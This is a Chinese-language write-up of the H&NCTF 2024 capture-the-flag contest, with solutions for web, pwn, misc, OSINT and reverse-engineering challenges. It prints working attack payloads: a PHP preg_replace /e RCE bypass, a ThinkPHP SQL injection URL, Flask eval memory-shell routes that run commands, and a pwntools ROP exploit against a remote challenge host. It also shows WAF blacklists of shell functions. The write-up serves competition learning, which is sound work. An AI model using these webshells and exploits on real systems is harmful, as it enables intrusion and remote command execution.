【2024】H&NCTF

Web

Please_RCE_Me

	GET传参输入?moran=flag，之后获取源码：

<?php
if($_GET['moran'] === 'flag'){
    highlight_file(__FILE__);
    if(isset($_POST['task'])&&isset($_POST['flag'])){
        $str1 = $_POST['task'];
        $str2 = $_POST['flag'];
        if(preg_match('/system|eval|assert|call|create|preg|sort|{|}|filter|exec|passthru|proc|open|echo|`| |\.|include|require|flag/i',$str1) || strlen($str2) != 19 || preg_match('/please_give_me_flag/',$str2)){
            die('hacker!');
        }else{
            preg_replace("/please_give_me_flag/ei",$_POST['task'],$_POST['flag']);
        }
    }
}else{
    echo "moran want a flag.</br>(?moran=flag)";
}

	这个是RCE吗？

	审一审。成功找到了漏洞点，preg_replace("/please_give_me_flag/ei",![](https://www.yuque.com/api/services/graph/generate_redirect/latex?_POST%5B'task'%5D%2C#card=math&code=_POST%5B%27task%27%5D%2C&id=o3Kvv)_POST['flag']);可以看到，存在/e模式，再看看PHP版本，5.6.40，可能存在/e的命令执行漏洞。

	前面，需要绕的Waf第一个为：

preg_match(‘/system|eval|assert|call|create|preg|sort|{|}|filter|exec|passthru|proc|open|echo|`| |.|include|require|flag/i’,$str1)

	这个绕过先放放，看看后面两个：

strlen(str2) != 19 || preg_match(‘/please_give_me_flag/’,str2)

	因为都是逻辑或，所以得让他们都为False，刚好，please_give_me_flag 长度为19，第二个正则刚好是大小写敏感，所以大小写混合绕过。

	然后就是补充下关于/e模式的问题：

preg_replace 使用了 /e 模式，导致可以代码执行，而且该函数的第一个和第三个参数都是我们可以控制的。我们都知道， preg_replace 函数在匹配到符号正则的字符串时，会将替换字符串（也就是上图 preg_replace 函数的第二个参数）当做代码来执行

	最后尝试下phpinfo：

//POST传参
flag=Please_give_me_flag&task=phpinfo()

	成功打出组合拳。

	再回头看看第一个过滤，看上去几乎把所有的shell函数都过滤了。推测flag在根目录，那么学着使用无参数RCE的方式打这套组合拳，payload如下：

flag=Please_give_me_flag&task=chdir(“/”)|highlight_file(scandir(pos(localeconv()))[7])

最后得到flag

ez_tp（复现）

看起来像是thinkphp的题，不过，是非预期的题，用平常的payload一把梭怕是不对，所以，还能怎么搞？下在附件下来审审吧。
在附件/ez_tp/App/Home/Controller中存在IndexController.class.php文件，打开看看：
这应该是一个路由吧：

public function h_n()

路由应该是h_n，那么，应该怎么打呢？不知道为啥，复现的时候日志找不到了，看dalao们的wp的时候，都说的是根据后台的日志有payload，但是现在跑去找又找不到了。
继续往后面审计，发现了如下代码

$name = I('GET.name');

好，知道了需要通过get传参，还是GET传参。

$pattern = "insert|update|delete|and|or|\/\*|\*|\.\.\/|\.\/|into|load_file|outfile|dumpfile|sub|hex";
            $pattern.= "|file_put_contents|fwrite|curl|system|eval|assert";
            $pattern.= "|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
            $pattern.= "|`|dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec";
            $vpattern = explode("|", $pattern);
            $bool = false;
            foreach ($input as $k => $v) {
                foreach ($vpattern as $value) {
                    foreach ($v as $kk => $vv) {
                        if (preg_match("/$value/i", $vv)) {
                            $bool = true;
                            break;
                        }
                    }
                    if ($bool) break;
                }
                if ($bool) break;
            }
            return $bool;

这里大概审一下就是，检测所有的键值对中，是否存在黑名单字段，所以，我们传入的参数键值对都不能出现黑名单字段，因此，文件包含和RCE没法打，再看看下面的这段代码：

if (waf()){
            $this->index();
        }else{
            $ret = $User->field('username,age')->where(array('username'=>$name))->select();
            echo var_export($ret, true);
        }

猜测应该这儿应该有个sql注入存在，并且没有过滤select，所以，根据thinkphp的以前的payload，以及大佬的wp中说的日志中的信息，可以得知payload为：

/index.php/home/index/h_n？name[0]=exp&name[1]=%3d%27test123%27%20union%20select%201,flag%20from%20flag

最后得到了flag： array ( 0 => array ( ‘username’ => ‘1’, ‘age’ => ‘H&NCTF{Cjp_6c3114ee-23e1-459b-ad88-9b29ccfde934}’, ), )

ezFlask（复现）

题目没出flask，但是好在了解了一个新的flask的ssti的姿势，记录在这儿，不知道为啥，跟着wp复现，却还是失败了，先记录吧，之后再改。
首先，打开网页就给了个提示：
:::info
冒险即将开始！！！ 请移步/Adventure路由进行命令执行，后端语句为： cmd = request.form[‘cmd’] eval(cmd) 注意，你仅有一次机会，在进行唯一一次成功的命令执行后生成flag并写入/flag 执行无回显，目录没权限部分命令ban，也不要想着写文件~
:::

失败情况：

大概跟他提示的一样，就是一个命令执行，不过没思路，很可惜，看了下wp，说的是写入内存马到一个路由里，但是我复现却失败了，不知是为何，他给的内存马的payload能成功写入，并且能访问到写入的路由，但是，却会报500错误，不知是为何，等官方wp出了再看看是为啥吧，payload先写在下面。

cmd=render_template_string("{{url_for.__globals__['__builtins__']['eval'](\"app.add_url_rule('/shell', 'myshell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd')).read())\",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})}}")

成功情况：

找到了另一个payload，同样是内存马，payload如下：

cmd=app.add_url_rule('/test','test',lambda:__import__('os').popen(request.args.get('cmd')).read())

之后访问/test?cmd=cat+/flag成功出flag：flag{42ae8a8b-4f88-4c45-a162-bd1881da16ea}。

Pwn:

close

	逆天题目，纯牛马出题人，想暴打。

	拿到题目第一件事儿是检查保护，这个题保护也就那样，PIE加NX。

root@g01den-virtual-machine:/mnt/shared# checksec pwn
[*] '/mnt/shared/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

	反编译看看：

int __fastcall main(int argc, const char **argv, const char **envp)
{
  puts("**********************************");
  puts("*     Welcome to the H&NCTF!     *");
  puts("**********************************");
  puts("*             *****              *");
  puts("*            *     *             *");
  puts("*           *  o o  *            *");
  puts("*          *    v    *           *");
  puts("*         *  *     *  *          *");
  puts("*         * * * * * * *          *");
  puts("**********************************");
  puts("*      Do you know close?        *");
  puts("**********************************");
  close(1);
  system("/bin/sh");
  return 0;
}

	这题目什么玩意儿？关闭了标准输出流还玩儿毛线？

	算了，老老实实干就完了。经过长时间查找资料，最后找到了做法。

root@g01den-virtual-machine:/mnt/shared# nc hnctf.imxbt.cn 35345
ls
ls: write error: Bad file descriptor
exec 1>&0
cat flag
H-NCTF{8d409dad-4b2f-4687-9f17-8b450a76946c}

	心中暗暗暴打出题人两分钟泄愤。    (*￣︿￣)

ez_pwn（复现，exp是大佬的，有时间自己再写个exp）

看到这个题，我突然觉得我是个执杖，我还以为是出题人故意搞我心态，结果是我学艺不精的缘故，好吧，我的问题，没看出来，我摊牌了，我是个XX。
好吧，老样子，Ubuntu启动！！！
还是先查看保护：

root@g01den-virtual-machine:/mnt/shared# checksec pwn
[*] '/mnt/shared/pwn'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

然后IDA反编译，漏洞函数为：

int vul()
{
  char s[40]; // [esp+0h] [ebp-2Ch] BYREF

  memset(s, 0, 0x20u);
  read(0, s, 0x30u);
  printf("Hello, %s\n", s);
  read(0, s, 0x30u);
  return printf("Hello, %s\n", s);
}

发现了点东西，就是，这里存在一些问题，就是，read函数读取的数据为48字节，但是，经过动态调试得出的缓冲区s的大小为44字节，好好好，IDA你又得记大过了。
之后，第一次不需要溢出，将缓冲区全部写满即可，因为存在%s这个格式串配合printf函数，所以，能够直接把rbp的值给打印出来，所以只需要接收之后，就可以拿到rbp的值了，然后，通过动态调试得到的rbp的地址与缓冲区buf的地址，就可以拿到字符串的地址了。


接收到了rbp的值之后，减去56就可以得到字符串的地址了。
之后则是需要通过栈调用read函数，向bss段写入sh;（这里我没弄懂为啥不能直接传/bin/sh，而是要传sh;进去），之后重新调用main函数重新运行程序，不过，到了这里之后会出一点问题，那就是，第二次进入main之后，栈的布局会发生变化，重新进入vul函数之后，里面的指针指向的是vul函数内的字符串，而不是之前那个，所以这里需要重新进行一次字符串地址的泄露，之后才能对栈进行布局来调用system函数。
大佬的exp如下：

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 0
IP = "hnctf.yuanshen.life"
PORT = 33070

elf = context.binary = ELF('./pwn')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

p = connect()

ru("Welcome to H&NCTF, my friend. What's your name?")

payload = "A" * 0x2c
s(payload)
ru(payload)

leak = u32(r(4))
buf_addr = leak - (0xfff93748 - 0xfff93710)
success(f"buf_addr ->{hex(buf_addr)}")

read = elf.plt['read']
vuln = 0x08048639
bss = 0x804a000
system = 0x0804857D

payload = p32(read) + p32(vuln) + p32(0) + p32(bss) + p32(0x4)
payload = payload.ljust(0x2c,b'a') + p32(buf_addr - 4)
s(payload)


time.sleep(0.3)
# g(p)
s(b'sh;\0')

ru("Welcome to H&NCTF, my friend. What's your name?")
payload = "A" * 0x4
s(payload)
ru(payload)

buf_addr = buf_addr
success(hex(buf_addr))


buf_addr = buf_addr - (0xffb45f80 - 0xffb45f4c)


payload = p32(system) + p32(bss) + p32(bss)
payload = payload.ljust(0x2c,b'a') + p32(buf_addr - 4)

# g(p)
s(payload)

p.interactive()

最后得到flag：H&NCTF{06b0540d-df19-4b49-9e63-fb7b8b67f8f9}

Misc:

ManCraft - 娱乐题:

	一个我的世界的服务器，下载1.20.4版本之后进入服务器，根据提示，先绑定队伍的token，之后迅速发育，然后勾引金甲僵尸，也就是劳大，把它勾引到陷阱里杀死，然后就能够拿到一个key，之后用这个key就能拿到flag。

osint（复现）:

onist.png

溯源的题，一张图片，光是图片来看，似乎只有两种可能，起飞或者降落，又因为题目要求我们输入目的地，所以，如果是难度不高的话，这儿应该是目的地。
检查图片属性，发现这张照片最后依次的修改时间是4月23日下午3点多，这张照片很明显是晚上拍摄的，所以，照例来说，这张图应该是在之前的晚上拍摄的，所以，先从4月22日晚上到23日凌晨的航班来看。
另外，根据机翼上红色的那个红色的图，在网上找到了应该是海南航空的飞机，且左边数字，有个22，大概推测注册号是X-22XX，左边的字母，好像是根据国家不同定的，中国的是B。
之后，搜索注册号为B-22，能够知道有几个：

之后，通过搜索4月22日晚上到4月23日凌晨那段时间的海南航空的飞机，大致可以得到航班号为HU7006。
拿到了航班之后，通过航班和时间搜索，能搜到起始地和目的地，目的地是海口美兰国际机场。
最后，感觉运气使然，在机场附近遇到个有点眼熟的路的弧度，抱着试一试的想法，把地址写上去，结果正确了：

最后flag：H-NCTF{ae53219d0966}

Re

最喜欢的逆向题

签到题
v1=a1[5]=105
64位

hnwna

一个CSharp写的小游戏
方法一：
用ILSPY打开下面的文件

搜索找到关键函数了（一开始搜索区域不对，导致找不到关键函数）

函数a为凯撒，if判断那里移位为5

加密

方法二：dnspy，类似于破解

DO YOU KNOW SWDD?（wait）

32位打开ida，出现SMC。

动态调试

在导入表中有virtualprotect函数，这里对内存权限进行了修改，大概率是SMC。

看41127B函数(断点位置下错了，照着wp都能错，服了）

看4113D9


p然后f5

可知是凯撒移位10位

childmaze

迷宫问题
方法一：静态分析
找到关键数据部分（不易找到），交叉引用

s = "H'L@PC}Ci625`hG2]3bZK4{1~"

for i in range(len(s)):
    print(chr(ord(s[i]) ^ (i % 7)), end="")

方法二：调试
在判断跳转的时候下个断点修改zf标识符或者改为jnz都能实现直接输出flag
emmIDA 版本问题吧，识别不出rust。。。。